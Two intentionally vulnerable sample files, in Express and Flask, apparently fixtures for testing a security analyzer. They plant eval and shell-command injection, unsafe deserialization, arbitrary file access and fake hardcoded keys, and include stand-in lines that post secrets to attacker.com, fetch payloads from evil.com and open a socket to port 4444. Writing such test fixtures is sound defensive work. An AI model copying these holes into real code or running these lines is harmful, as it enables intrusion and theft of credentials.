File: test_vulnerable_sample.js
/**
 * INTENTIONALLY VULNERABLE CODE - FOR TESTING SECURITY ANALYZER
 * DO NOT USE IN PRODUCTION
 */

const express = require('express');
const { exec, execSync, spawn } = require('child_process');
const fs = require('fs');
const app = express();

// HARDCODED SECRETS (Should be detected)
const AWS_SECRET = "AKIAIOSFODNN7EXAMPLE5678";
const GITHUB_PAT = "ghp_abcdefghijklmnopqrstuvwxyz1234567890";
const STRIPE_KEY = "sk_live_abcdefghijklmnopqrstuvwxyz";
const JWT_SECRET = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.secret";
const API_TOKEN = "xoxp-123456789012-123456789012-abcdefghijklmnopqrstuvwxyz";

// High entropy string
const ENCRYPTION_KEY = "9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f";

// CRITICAL: Code Execution Vulnerability
app.get('/eval', (req, res) => {
    // User input directly to eval
    const code = req.query.code; // Taint source
    const result = eval(code);    // DANGEROUS SINK
    res.send(result);
});

// CRITICAL: Command Injection
app.get('/exec', (req, res) => {
    const filename = req.query.file; // Taint source
    exec(`cat ${filename}`, (error, stdout) => { // DANGEROUS
        res.send(stdout);
    });
});

// CRITICAL: Shell Command with User Input
app.get('/command', (req, res) => {
    const cmd = req.query.cmd; // Taint source
    execSync(cmd); // DANGEROUS SINK
    res.send('Executed');
});

// HIGH: Dynamic Function Creation
app.get('/function', (req, res) => {
    const code = req.query.code; // Taint source
    const dynamicFunc = new Function(code); // DANGEROUS
    dynamicFunc();
    res.send('Done');
});

// HIGH: setTimeout with String
app.get('/timeout', (req, res) => {
    const code = req.query.code; // Taint source
    setTimeout(code, 1000); // DANGEROUS
    res.send('Scheduled');
});

// MEDIUM: Arbitrary File Write
app.post('/write', (req, res) => {
    const path = req.body.path;    // Taint source
    const content = req.body.data; // Taint source
    fs.writeFileSync(path, content); // DANGEROUS
    res.send('Written');
});

// MEDIUM: File Delete
app.delete('/file', (req, res) => {
    const path = req.query.path; // Taint source
    fs.unlinkSync(path); // DANGEROUS
    res.send('Deleted');
});

// Dangerous VM usage
const vm = require('vm');
app.get('/vm', (req, res) => {
    const code = req.query.code; // Taint source
    vm.runInThisContext(code); // DANGEROUS
    res.send('Executed in VM');
});

// Network operations
const https = require('https');
const axios = require('axios');

function exfiltrateData() {
    // Sending sensitive data externally
    axios.post('http://attacker.com/collect', {
        aws: AWS_SECRET,
        github: GITHUB_PAT,
        stripe: STRIPE_KEY
    });
}

function downloadPayload() {
    // Downloading external file
    const file = fs.createWriteStream('/tmp/malware.js');
    https.get('https://evil.com/payload.js', (response) => {
        response.pipe(file);
    });
}

// Taint flow example
function taintFlowDemo() {
    // Source: Process arguments
    const userInput = process.argv[2]; // Taint source
    
    // Some processing
    const processed = userInput.toUpperCase();
    
    // Sink: Dangerous function
    eval(processed); // CRITICAL TAINT FLOW
}

// Using environment variables unsafely
const DB_PASSWORD = process.env.DB_PASS || "default_password_123";
const SECRET_KEY = process.env.SECRET || "hardcoded_secret_key";

// Weak crypto
const crypto = require('crypto');
function weakHash(data) {
    return crypto.createHash('md5').update(data).digest('hex'); // WEAK
}

// Child process spawn with shell
function unsafeSpawn(cmd) {
    spawn(cmd, { shell: true }); // DANGEROUS
}

// JSON.parse without validation
app.post('/parse', (req, res) => {
    const data = req.body.json; // Taint source
    const parsed = JSON.parse(data); // Could be exploited
    res.json(parsed);
});

// File read with user-controlled path
app.get('/read', (req, res) => {
    const filepath = req.query.file; // Taint source
    const content = fs.readFileSync(filepath, 'utf8'); // DANGEROUS - Path traversal
    res.send(content);
});

// Start server
const PORT = process.env.PORT || 3000;
app.listen(PORT, '0.0.0.0', () => {
    console.log(`Server running on port ${PORT}`);
    console.log(`AWS Key: ${AWS_SECRET}`); // Logging secrets
});

module.exports = app;

File: test_vulnerable_sample.py
"""
INTENTIONALLY VULNERABLE CODE - FOR TESTING SECURITY ANALYZER
DO NOT USE IN PRODUCTION
"""

import os
import sys
import pickle
import subprocess
from flask import Flask, request

app = Flask(__name__)

# HARDCODED SECRETS (Should be detected)
AWS_ACCESS_KEY = "AKIAIOSFODNN7EXAMPLE1234"
GITHUB_TOKEN = "ghp_1234567890abcdefghijklmnopqrst123456"
DATABASE_URL = "postgresql://admin:SuperSecret123@localhost:5432/prod"
API_KEY = "sk_live_51234567890abcdefghijklmnopqrstuvwxyz"
ENCRYPTED_DATA = "ZXZhbChfX2ltcG9ydF9fKCdvcycpLnN5c3RlbSgnbHMgLWxhJykp"  # Base64 encoded

# High entropy secret
SECRET_TOKEN = "8f4d9c2b7e1a6f3d9c8b7a6e5d4c3b2a1f9e8d7c6b5a4e3d2c1b0"

@app.route('/execute')
def dangerous_execute():
    """CRITICAL VULNERABILITY: Code Execution"""
    # User input flows directly to eval
    code = request.args.get('code')  # Taint source
    result = eval(code)  # DANGEROUS SINK
    return str(result)

@app.route('/command')
def command_injection():
    """CRITICAL VULNERABILITY: Command Injection"""
    # User input in system command
    filename = request.args.get('file')  # Taint source
    os.system(f"cat {filename}")  # DANGEROUS SINK
    return "Command executed"

@app.route('/subprocess')
def subprocess_vuln():
    """HIGH VULNERABILITY: Subprocess with shell=True"""
    user_cmd = request.args.get('cmd')  # Taint source
    subprocess.call(user_cmd, shell=True)  # DANGEROUS
    return "Done"

@app.route('/pickle')
def pickle_vuln():
    """CRITICAL VULNERABILITY: Insecure Deserialization"""
    data = request.data  # Taint source
    obj = pickle.loads(data)  # DANGEROUS SINK
    return "Deserialized"

@app.route('/file_write')
def file_write():
    """MEDIUM VULNERABILITY: Arbitrary File Write"""
    filename = request.args.get('filename')  # Taint source
    content = request.args.get('content')
    with open(filename, 'w') as f:  # DANGEROUS
        f.write(content)
    return "File written"

def unsafe_operations():
    """Collection of unsafe operations"""
    # Command execution variants
    os.popen("ls -la")
    subprocess.Popen("whoami", shell=True)
    
    # Dynamic code execution
    exec("print('danger')")
    compile("malicious_code", "string", "exec")
    __import__("os").system("pwd")
    
    # Weak cryptography
    import hashlib
    password_hash = hashlib.md5(b"password").hexdigest()  # Weak
    
    # File operations with user input
    user_file = sys.argv[1] if len(sys.argv) > 1 else "/tmp/test"
    with open(user_file, 'r') as f:
        data = f.read()

def network_operations():
    """Network operations that could be suspicious"""
    import urllib.request
    import requests
    
    # Download from external source
    urllib.request.urlretrieve("http://evil.com/payload.sh", "/tmp/malware.sh")
    
    # Make HTTP requests
    requests.post("http://attacker.com/exfiltrate", data={"secrets": AWS_ACCESS_KEY})
    
    # Socket operations
    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.1.100", 4444))

def taint_flow_example():
    """Demonstrate taint flow from source to sink"""
    # Source: Command line argument
    user_input = sys.argv[0] if len(sys.argv) > 0 else ""
    
    # Some processing
    processed = user_input.upper()
    
    # Sink: Dangerous function
    eval(processed)  # CRITICAL TAINT FLOW

if __name__ == "__main__":
    # Using environment variables unsafely
    secret_key = os.environ.get("SECRET_KEY", "default_secret_123")
    
    # More dangerous operations
    app.secret_key = secret_key
    app.run(host="0.0.0.0", debug=True)  # Debug mode in production


